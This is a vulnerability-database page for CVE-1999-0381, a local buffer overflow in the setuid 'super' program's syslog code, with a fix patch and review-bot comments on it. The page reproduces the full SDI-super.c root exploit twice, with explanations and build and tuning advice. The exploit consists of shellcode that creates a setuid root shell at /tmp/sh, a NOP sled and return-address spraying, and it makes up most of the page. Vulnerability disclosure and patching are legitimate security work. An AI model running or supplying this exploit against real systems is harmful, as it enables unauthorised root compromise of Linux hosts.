CVE-1999-0381
CVSS7.2
发布时间 :1999-02-26 00:00:00
修订时间 :2008-09-09 08:34:26

[原文]super 3.11.6 and other versions have a buffer overflow in the syslog utility which allows a local user to gain root access.


[CNNVD]Debian Super Syslog缓冲区溢出漏洞(CNNVD-199902-058)

        super 3.11.6及其它版本的syslog功能存在缓冲区溢出漏洞（仅当super以SYSLOG选项编译时存在）。本地用户可利用此漏洞获得root权限。

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:debian:debian_linux:2.0Debian Debian Linux 2.0
cpe:/o:linux:linux_kernel:2.6.20.1Linux Kernel 2.6.20.1
注：以上CPE条目来自NVD，并未列出受影响组件super本身；实际受影响的是启用SYSLOG选项编译并以setuid root安装的super 3.11.6及其它版本。

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0381
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0381
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199902-058
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/342
(VENDOR_ADVISORY)  BID  342
http://www.securityfocus.com/templates/archive.pike?list=1&msg=Pine.LNX.3.96.990225011801.12757A-100000@eleet
(UNKNOWN)  BUGTRAQ  19990225 SUPER buffer overflow

- 漏洞信息

Debian Super Syslog缓冲区溢出漏洞
高危 缓冲区溢出
1999-02-26 00:00:00 2005-10-20 00:00:00
本地  
        super 3.11.6及其它版本的syslog功能存在缓冲区溢出漏洞（仅当super以SYSLOG选项编译时存在）。本地用户可利用此漏洞获得root权限。

- 公告与补丁

        Remove the suid bit from the super binary or apply the following patch:
        --- error.c Thu Feb 25 00:38:25 1999
        +++ error.patch.c Thu Feb 25 01:07:53 1999
        @@ -321,7 +321,7 @@
        if (tag)
        StrLCat(newfmt, tag, sizeof(newfmt));
        va_start(ap, fmt);
        - (void) vsprintf(buf, newfmt, ap);
        + (void) vsnprintf(buf, sizeof(buf), newfmt, ap);
        va_end(ap);
        SysLog(error_priority, buf);
        }
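Review bot: vsnprintf() closes the overflow into `buf`, but the format string itself is still assembled by appending `tag` to `newfmt` on the lines above `va_start`, so any `%` conversions inside `tag` are interpreted against `ap`; whether `tag` can ever carry caller-controlled text is not visible in this hunk and should be confirmed. If it can, keep `tag` out of the format and append it afterwards with a bounded call, e.g. `vsnprintf(buf, sizeof(buf), fmt, ap); StrLCat(buf, tag, sizeof(buf));`. The return value is discarded with `(void)`, which is acceptable for a log line but means a message longer than `buf` is silently cut; a comment such as `/* truncation is acceptable for a log line */` would make that deliberate. `sizeof(buf)` is only correct because `buf` is a local array (`buf[MAXPRINT]` according to the advisory text); Error()'s declarations lie outside the hunk.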
        @@ -485,7 +485,7 @@
        StrLCat(newfmt, fmt, sizeof(newfmt));
        if (tag)
        StrLCat(newfmt, tag, sizeof(newfmt));
        - (void) vsprintf(buf, newfmt, ap);
        + (void) vsnprintf(buf, sizeof(buf), newfmt, ap);
        va_end(ap);
        SysLog(error_priority, buf);
        }
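Review bot: The now-bounded `buf` is still handed straight to `SysLog(error_priority, buf)`; if that wrapper passes it to syslog(3) as the format argument rather than as `"%s", buf`, `%` sequences that survive from `fmt`/`tag` remain a format-string problem after this fix — SysLog's body is not on this page, so confirm how it calls syslog(). This function's `va_start` and its `buf`/`newfmt` declarations are outside the hunk, so the `sizeof(buf)` bound can only be checked against the advisory's statement that `buf` is `buf[MAXPRINT]`, not an array parameter that would decay to a pointer. As in the first hunk, truncation is silently accepted via the `(void)` cast.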

- 漏洞信息 (19270)

Debian Linux 2.0 Super Syslog Buffer Overflow Vulnerability (EDBID:19270)
linux local
1999-02-25 Verified
0 c0nd0r
source: http://www.securityfocus.com/bid/342/info


After the first super buffer overflow vulnerability was discovered, another appeared shortly after. This vulnerability exists only when super is compiled with the syslog option enabled. The overflow is in the file error.c, in the Error() function, where the message is formatted into the fixed-size buf[MAXPRINT] buffer with vsprintf() and no bounds checking; a local user who can make super log a sufficiently long string overwrites the stack. Because super is installed setuid root, the consequence is a local root compromise. 

--------------- SDI-super.c --------------------------------------

/*

* [ Sekure SDI ]

* [ Brazilian Info Security Team ]

* | ---------------------------------- ]

* | SUPER exploit for linux |

* | ---------------------------------- |

* | |

* | http://ssc.sekure.org |

* | Sekure SDI Secure Coding Team |

* | |

* | ---------------------------------- |

* | by c0nd0r <condor@sekure.org> |

* | ---------------------------------- |

* [ thanks for the ppl at sekure.org: ]

* [ jamez(shellcode), bishop, dumped, ]

* [ bahamas, fcon, vader, yuckfoo. ]

*

*

* This will exploit a buffer overflow condition in the log section of

* the SUPER program.

*

* It will create a suid bash owned by root at /tmp/sh.

* (It'll defeat the debian bash-2.xx protection against rootshell)

*

* Note: The SUPER program must be compiled with the SYSLOG option.

*

* also thanks people from #uground (irc.brasnet.org network)

*

*/

/*
 * Linux/x86 (32-bit) execve() payload followed by the command line it runs.
 *
 * The jmp at the start and the call at the end are the usual "find my own
 * address" pair: jmp over the code to the call, the call pushes the address
 * of the string that follows it, and `pop %esi` picks that address up. The
 * payload then patches NUL bytes into the string in place and builds argv
 * just past its end, so the payload itself contains no 0x00 byte (it is
 * copied with strlen() below). Byte values are identical to the original.
 */
char shellcode[] =
    "\xeb\x31"                 /* jmp  +0x31            -> to the call below          */
    "\x5e"                     /* pop  %esi             ; esi = address of the string */
    "\x89\x76\x32"             /* mov  %esi,0x32(%esi)  ; argv[0] = "/bin/sh"         */
    "\x8d\x5e\x08"             /* lea  0x8(%esi),%ebx   ; "-c"                        */
    "\x89\x5e\x36"             /* mov  %ebx,0x36(%esi)  ; argv[1] = "-c"              */
    "\x8d\x5e\x0b"             /* lea  0xb(%esi),%ebx   ; "cp /bin/sh ..."            */
    "\x89\x5e\x3a"             /* mov  %ebx,0x3a(%esi)  ; argv[2] = the command       */
    "\x31\xc0"                 /* xor  %eax,%eax                                      */
    "\x88\x46\x07"             /* movb %al,0x7(%esi)    ; NUL after "/bin/sh"         */
    "\x88\x46\x0a"             /* movb %al,0xa(%esi)    ; NUL after "-c"              */
    "\x88\x46\x31"             /* movb %al,0x31(%esi)   ; NUL at the end of the string*/
    "\x89\x46\x3e"             /* mov  %eax,0x3e(%esi)  ; argv[3] = NULL              */
    "\xb0\x0b"                 /* mov  $0xb,%al         ; SYS_execve                  */
    "\x89\xf3"                 /* mov  %esi,%ebx        ; path = "/bin/sh"            */
    "\x8d\x4e\x32"             /* lea  0x32(%esi),%ecx  ; argv                        */
    "\x8d\x56\x3e"             /* lea  0x3e(%esi),%edx  ; envp (points at the NULL)   */
    "\xcd\x80"                 /* int  $0x80                                          */
    "\x31\xdb"                 /* xor  %ebx,%ebx                                      */
    "\x89\xd8"                 /* mov  %ebx,%eax                                      */
    "\x40"                     /* inc  %eax             ; SYS_exit(0) if execve failed*/
    "\xcd\x80"                 /* int  $0x80                                          */
    "\xe8\xca\xff\xff\xff"     /* call -0x36            -> back to the pop %esi       */
    "/bin/sh -c cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh";

/*
 * Returns an approximation of the current stack pointer; main() adds the
 * user-supplied offset to it to guess where the payload will sit in super's
 * frame. GCC/i386 only: the asm leaves %esp in %eax and there is no return
 * statement, so the result relies on %eax being the return register
 * (undefined behaviour in ISO C; works with GCC on 32-bit x86). On x86-64
 * the same instruction would only capture the low 32 bits of %rsp.
 * Left byte-for-byte as in the original: changing this function's frame
 * (e.g. adding a local for an output operand) would shift the returned
 * value and therefore the exploit's address guess.
 */
unsigned long getsp ( void) {

__asm__("mov %esp,%eax");

}

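/*
 * Builds the overflow string and hands it to super(1) through its -T option.
 *
 * Layout of itamar[]:
 *   [0, 1410 - strlen(shellcode))   NOP sled (0x90)
 *   [.., 1410)                      the shellcode above, ending at byte 1410
 *   [1410, 1500)                    the guessed return address, repeated
 *   [1500]                          terminating NUL
 *
 * The return address is stored with its bytes rotated (most significant
 * byte first, then the low three bytes). Read at a one-byte misalignment
 * that is a little-endian address, so one of the repeated copies lines up
 * with the saved return address whatever its alignment in the victim's
 * frame. This is part of the original exploit's calculation and is kept
 * exactly as written.
 *
 * argv[1] (optional): offset added to getsp() to form the guessed address;
 * defaults to 1000 and is the knob to turn when the guess misses. Note the
 * guess depends on this program's own stack frame, so compiler flags or a
 * changed set of locals shift it -- retune with argv[1] rather than
 * editing the constants.
 *
 * The original listing has no #include lines and relies on implicit
 * declarations; add <stdio.h>, <stdlib.h>, <string.h> and <unistd.h> to
 * build it with a modern compiler.
 *
 * Does not return on success (execl replaces the process); returns 1 if the
 * exec itself fails.
 */
int main(int argc, char *argv[])
{
    char itamar[2040];              /* "ta mar mesmo" in the original */
    long addr;
    int x, y = 0, offset = 1000;    /* y was uninitialised in the original (UB) */

    /* argv[1] is taken as-is, as in the original: a non-numeric value yields 0. */
    if (argc > 1)
        offset = atoi(argv[1]);
    addr = getsp() + offset;

    /* NOP sled up to where the payload starts. */
    for (x = 0; x < (int)(1410 - strlen(shellcode)); x++)
        itamar[x] = (char)0x90;

    /* The payload itself, copied without its trailing NUL. */
    for (; y < (int)strlen(shellcode); x++, y++)
        itamar[x] = shellcode[y];

    /* Return-address slots, byte-rotated as described above. */
    for (; x < 1500; x += 4) {
        itamar[x]     = (char)((addr & 0xff000000) >> 24);
        itamar[x + 1] = (char)(addr & 0x000000ff);
        itamar[x + 2] = (char)((addr & 0x0000ff00) >> 8);
        itamar[x + 3] = (char)((addr & 0x00ff0000) >> 16);
    }
    itamar[x++] = '\0';

    /* %lx: addr is a long (the original used %x). */
    printf("\nwargames at 0x%lx, offset %d\n", addr, offset);
    printf("Look for a suid shell root owned at /tmp/sh\n");

    execl("/usr/local/bin/super", "super", "-T", itamar, (char *)0);

    /* Only reached if the exec failed (e.g. super is not installed at that path). */
    perror("execl");
    return 1;
}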

- 漏洞信息

5888
super Syslog Utility Local Overflow
Local Access Required Input Manipulation
Loss of Integrity Workaround, Third-Party Solution
Exploit Public

- 漏洞描述

A local overflow exists in super on Debian. The program fails to bounds-check a buffer when the syslog option is enabled, resulting in a stack overflow. With a specially crafted argument, a local attacker can gain root privileges, resulting in a loss of confidentiality, integrity, and/or availability.

- 时间线

1999-02-25 1999-02-26
Unknown Unknown

- 解决方案

Debian has released a patch to address this vulnerability; as a workaround, remove the setuid bit from the super binary (chmod u-s /usr/local/bin/super).

- 相关参考

- 漏洞作者

- 漏洞信息

Debian Super Syslog Buffer Overflow Vulnerability
Unknown 342
No Yes
1999-02-25 12:00:00 2009-07-11 12:16:00
First posted to BugTraq by c0nd0r <root@sekure.org> on February 25, 1999.

- 受影响的程序版本

Debian Linux 2.0

- 漏洞讨论

After the first super buffer overflow vulnerability was discovered, another appeared shortly after. This vulnerability exists only when super is compiled with the syslog option enabled. The overflow is in the file error.c, in the Error() function, where the message is formatted into the fixed-size buf[MAXPRINT] buffer with vsprintf() and no bounds checking; a local user who can make super log a sufficiently long string overwrites the stack. Because super is installed setuid root, the consequence is a local root compromise.

- 漏洞利用

--------------- SDI-super.c --------------------------------------

/*

* [ Sekure SDI ]

* [ Brazilian Info Security Team ]

* | ---------------------------------- ]

* | SUPER exploit for linux |

* | ---------------------------------- |

* | |

* | http://ssc.sekure.org |

* | Sekure SDI Secure Coding Team |

* | |

* | ---------------------------------- |

* | by c0nd0r <condor@sekure.org> |

* | ---------------------------------- |

* [ thanks for the ppl at sekure.org: ]

* [ jamez(shellcode), bishop, dumped, ]

* [ bahamas, fcon, vader, yuckfoo. ]

*

*

* This will exploit a buffer overflow condition in the log section of

* the SUPER program.

*

* It will create a suid bash owned by root at /tmp/sh.

* (It'll defeat the debian bash-2.xx protection against rootshell)

*

* Note: The SUPER program must be compiled with the SYSLOG option.

*

* also thanks people from #uground (irc.brasnet.org network)

*

*/

/*
 * Linux/x86 (32-bit) execve() payload followed by the command line it runs.
 *
 * The jmp at the start and the call at the end are the usual "find my own
 * address" pair: jmp over the code to the call, the call pushes the address
 * of the string that follows it, and `pop %esi` picks that address up. The
 * payload then patches NUL bytes into the string in place and builds argv
 * just past its end, so the payload itself contains no 0x00 byte (it is
 * copied with strlen() below). Byte values are identical to the original.
 */
char shellcode[] =
    "\xeb\x31"                 /* jmp  +0x31            -> to the call below          */
    "\x5e"                     /* pop  %esi             ; esi = address of the string */
    "\x89\x76\x32"             /* mov  %esi,0x32(%esi)  ; argv[0] = "/bin/sh"         */
    "\x8d\x5e\x08"             /* lea  0x8(%esi),%ebx   ; "-c"                        */
    "\x89\x5e\x36"             /* mov  %ebx,0x36(%esi)  ; argv[1] = "-c"              */
    "\x8d\x5e\x0b"             /* lea  0xb(%esi),%ebx   ; "cp /bin/sh ..."            */
    "\x89\x5e\x3a"             /* mov  %ebx,0x3a(%esi)  ; argv[2] = the command       */
    "\x31\xc0"                 /* xor  %eax,%eax                                      */
    "\x88\x46\x07"             /* movb %al,0x7(%esi)    ; NUL after "/bin/sh"         */
    "\x88\x46\x0a"             /* movb %al,0xa(%esi)    ; NUL after "-c"              */
    "\x88\x46\x31"             /* movb %al,0x31(%esi)   ; NUL at the end of the string*/
    "\x89\x46\x3e"             /* mov  %eax,0x3e(%esi)  ; argv[3] = NULL              */
    "\xb0\x0b"                 /* mov  $0xb,%al         ; SYS_execve                  */
    "\x89\xf3"                 /* mov  %esi,%ebx        ; path = "/bin/sh"            */
    "\x8d\x4e\x32"             /* lea  0x32(%esi),%ecx  ; argv                        */
    "\x8d\x56\x3e"             /* lea  0x3e(%esi),%edx  ; envp (points at the NULL)   */
    "\xcd\x80"                 /* int  $0x80                                          */
    "\x31\xdb"                 /* xor  %ebx,%ebx                                      */
    "\x89\xd8"                 /* mov  %ebx,%eax                                      */
    "\x40"                     /* inc  %eax             ; SYS_exit(0) if execve failed*/
    "\xcd\x80"                 /* int  $0x80                                          */
    "\xe8\xca\xff\xff\xff"     /* call -0x36            -> back to the pop %esi       */
    "/bin/sh -c cp /bin/sh /tmp/sh; chmod 4755 /tmp/sh";

/*
 * Returns an approximation of the current stack pointer; main() adds the
 * user-supplied offset to it to guess where the payload will sit in super's
 * frame. GCC/i386 only: the asm leaves %esp in %eax and there is no return
 * statement, so the result relies on %eax being the return register
 * (undefined behaviour in ISO C; works with GCC on 32-bit x86). On x86-64
 * the same instruction would only capture the low 32 bits of %rsp.
 * Left byte-for-byte as in the original: changing this function's frame
 * (e.g. adding a local for an output operand) would shift the returned
 * value and therefore the exploit's address guess.
 */
unsigned long getsp ( void) {

__asm__("mov %esp,%eax");

}

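/*
 * Builds the overflow string and hands it to super(1) through its -T option.
 * (This copy of the listing had its <, > and & HTML-escaped; restored here.)
 *
 * Layout of itamar[]:
 *   [0, 1410 - strlen(shellcode))   NOP sled (0x90)
 *   [.., 1410)                      the shellcode above, ending at byte 1410
 *   [1410, 1500)                    the guessed return address, repeated
 *   [1500]                          terminating NUL
 *
 * The return address is stored with its bytes rotated (most significant
 * byte first, then the low three bytes). Read at a one-byte misalignment
 * that is a little-endian address, so one of the repeated copies lines up
 * with the saved return address whatever its alignment in the victim's
 * frame. This is part of the original exploit's calculation and is kept
 * exactly as written.
 *
 * argv[1] (optional): offset added to getsp() to form the guessed address;
 * defaults to 1000 and is the knob to turn when the guess misses. Note the
 * guess depends on this program's own stack frame, so compiler flags or a
 * changed set of locals shift it -- retune with argv[1] rather than
 * editing the constants.
 *
 * The original listing has no #include lines and relies on implicit
 * declarations; add <stdio.h>, <stdlib.h>, <string.h> and <unistd.h> to
 * build it with a modern compiler.
 *
 * Does not return on success (execl replaces the process); returns 1 if the
 * exec itself fails.
 */
int main(int argc, char *argv[])
{
    char itamar[2040];              /* "ta mar mesmo" in the original */
    long addr;
    int x, y = 0, offset = 1000;    /* y was uninitialised in the original (UB) */

    /* argv[1] is taken as-is, as in the original: a non-numeric value yields 0. */
    if (argc > 1)
        offset = atoi(argv[1]);
    addr = getsp() + offset;

    /* NOP sled up to where the payload starts. */
    for (x = 0; x < (int)(1410 - strlen(shellcode)); x++)
        itamar[x] = (char)0x90;

    /* The payload itself, copied without its trailing NUL. */
    for (; y < (int)strlen(shellcode); x++, y++)
        itamar[x] = shellcode[y];

    /* Return-address slots, byte-rotated as described above. */
    for (; x < 1500; x += 4) {
        itamar[x]     = (char)((addr & 0xff000000) >> 24);
        itamar[x + 1] = (char)(addr & 0x000000ff);
        itamar[x + 2] = (char)((addr & 0x0000ff00) >> 8);
        itamar[x + 3] = (char)((addr & 0x00ff0000) >> 16);
    }
    itamar[x++] = '\0';

    /* %lx: addr is a long (the original used %x). */
    printf("\nwargames at 0x%lx, offset %d\n", addr, offset);
    printf("Look for a suid shell root owned at /tmp/sh\n");

    execl("/usr/local/bin/super", "super", "-T", itamar, (char *)0);

    /* Only reached if the exec failed (e.g. super is not installed at that path). */
    perror("execl");
    return 1;
}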

- 解决方案

Remove the suid bit from the super binary or apply the following patch:

--- error.c Thu Feb 25 00:38:25 1999

+++ error.patch.c Thu Feb 25 01:07:53 1999

@@ -321,7 +321,7 @@

if (tag)

StrLCat(newfmt, tag, sizeof(newfmt));

va_start(ap, fmt);

- (void) vsprintf(buf, newfmt, ap);

+ (void) vsnprintf(buf, sizeof(buf), newfmt, ap);

va_end(ap);

SysLog(error_priority, buf);

}
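Review bot: The bound on `buf` is the right fix for the overflow, but `newfmt` is still built by concatenating `tag` into the format just above `va_start`, so a `%` inside `tag` is consumed as a conversion against `ap`; this hunk does not show where `tag` comes from, so confirm it is never derived from the user's command line. If it can be, format with `fmt` alone and append `tag` to the result with a bounded `StrLCat(buf, tag, sizeof(buf))` instead. The `(void)` cast discards vsnprintf's length, so over-long messages are truncated without notice -- fine for logging, but worth a one-line comment saying so. `sizeof(buf)` assumes `buf` is the local `buf[MAXPRINT]` array the advisory describes; its declaration is outside the hunk.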

@@ -485,7 +485,7 @@

StrLCat(newfmt, fmt, sizeof(newfmt));

if (tag)

StrLCat(newfmt, tag, sizeof(newfmt));

- (void) vsprintf(buf, newfmt, ap);

+ (void) vsnprintf(buf, sizeof(buf), newfmt, ap);

va_end(ap);

SysLog(error_priority, buf);

}
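Review bot: After the bounded format, `buf` is passed to `SysLog(error_priority, buf)` on the last visible line; whether that wrapper calls `syslog(pri, "%s", buf)` or uses `buf` as the format cannot be seen on this page, and in the latter case any `%` that survives in the message is still a format-string issue after this patch. The function's `va_start` and its declarations of `buf` and `newfmt` are outside the hunk, so the `sizeof(buf)` bound relies on the advisory's statement that `buf` is a `buf[MAXPRINT]` array rather than a pointer parameter. Truncation is silently accepted via the `(void)` cast, as in the first hunk.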

- 相关参考

     

     
